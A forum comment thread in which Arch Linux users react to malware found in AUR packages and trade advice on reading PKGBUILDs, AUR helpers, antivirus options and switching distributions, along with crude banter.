You must log in or register to comment.
ClamAV users, how’s it going?
I learnt a lesson yeah. It looks like I got away, there’s no rootkit, I found nothing weird running, I don’t have npm Installed, and up until now it doesn’t seem like the packages I had installed were compromised. But I had way more AUR packages installed than I was aware of. And I was just updating them without really caring about the pkgbuild, I have better things to do. Multiple packages were outdated crap that shouldn’t have been there anymore.
I was careless and took too much risk. I reduced the Installed AUR packages to a minimum, and from now on I will verify the PKGBUILDs on every update. Maybe Arch isn’t really what I need. I’m on the LTS kernel and I no longer really use the AUR. But switching will be a huge hassle and this setup will work well from here on out, so I’ll stick to it for now
So what are good antivirus options for Linux? is it still pretty much just ClamAV?
Our company uses eset https://www.eset.com/us/home/antivirus/
But afaik it costs money to really work.
But your brain should be the best antivirus you have.
But your brain should be the best antivirus you have.
Is there an AUR package for it? seems not in the official repo
one thread I found from 2 years ago where someone asked for the same thing, a lot of the replies are just “you don’t need antivirus on Linux” lmao
I am at “no fucking yays and the bunch, check the package create/update dates, read PKGBUILD, only update when necessary”. Has served me well so far
Arch users just randomly dropping “I use Arch btw” everywhere, it was only a matter of time.
And you believe that makes you safe?
Shit like this is a blemish on the Linux community.
deleted by creator
The more popular Linux becomes, the less true this will be.
Avoid success at all costs - Simon Peyton Jones
I was on arch as a vestige from my school days, having never quite found the time to switch to something more stable. When I saw the news over the weekend, I checked and found 1 would-be-infected package on my machine that was thankfully months out of date. I’m well past the point of wanting to examine PKGBUILDs every time (hence the out of date package). But, instead of just removing AUR packages and sticking to arch repos, I decided to sweep up the technical debt by wiping and installing Fedora. I’m liking it so far, minus the absolute pain in the ass that is Nvidia on Linux. Fuck academics and their insistence on writing everything targeting CUDA; otherwise, I’d have saved a good bit of money a few years ago with a much more compatible AMD card.
Have you looked into drop-in (ZLUDA) or recompile (SCALE, chipStar) things? Though they may not have been helpful with the years gone by (and may each have their own pros/cons).
I’m still using a 1050Ti (and legacy driver shifting to AUR did block me from updating), value doesn’t seem great and not going to buy something used from eBay. So that still complicates things for me.
Distro-wise I probably want something slower than Arch but not sure about point releases. And I am hoping for something that does updates in a way more friendly to slower internet (giving less update friction), but I suspect it doesn’t exist. Some things (OpenSUSE, NixOS) seem like they might be closer to I want but I have hangups about them (Patterns on SUSE and lack of videos for Slowroll, NixOS having multiple solutions for dynamically linked executables especially if I decide to stop using Steam directly).
Isnt it just a single line command to get nvidia working?
Use the AUR, have an antivirus, no infected packages. However I was thinking of switching to https://chimera-linux.org/ before the infected packages went out.
Custom OS that no one else has access to. It might be full of exploits and bugs, but only you would know that. 😉
Security through insecurity
Though, Linux being open source helps a lot
My eyes, I look at AUR packages before building them, as any real arch user does. AFAIK, antivirus programs would do the same to compiled binaries, looking for suspicious things and blocking if it finds something.
Also, an ad blocker.
Never trust an NPM library
Fuck node
… technical name for glory hole
OR
Your mom’s a fuck node
bu-but so many libraries need funding!
Linux Users: haha those silly windows users, always searching the web for their software and getting viruses.
Linux Users: oh no I got malware by searching the AUR!The AUR is still safer. One, it is at least minimally moderated. If a malicious package is detected, it can be reported and removed. Two, the installer is usually not just a black box executable. Three, most of the build and runtime dependencies are from the official Arch repos, which provides some protection against supply chain attacks. For Windows installers, you have to trust the distributor to bundle clean DLLs (for that matter, the same applies to AppImages).
But if it starts downloading anything from NPM… ^C and run.
The most unsafe factor of the AUR is aur helpers and their goal to dumb everything down and streamline the process as if the AUR where an official repo
I’m not entirely sure I agree, I think the issue is with default settings.
Like you could use both yay and paru to diff the PKGBUILD of the most recent updat and then read it, and then approve each. And I think that’s pretty helpful. But you could also just blindly accept the update with the right config or flag and that is not a good practice.
Yeah, use and promote
aurtoinstead. They require you to trust the maintainer and would remove the package from the local repo if the maintainer is changed
Ye my reaction to this was basically uninstalling yay to force me to do it manually
appimages are kinda like portable app versions.
AUR naur! for all my Australians out there.
Don’t worry, I found a package on npm to help!
By misusing the AUR and ignoring every warning telling you to read and understand the pkgbuild or don’t do it.
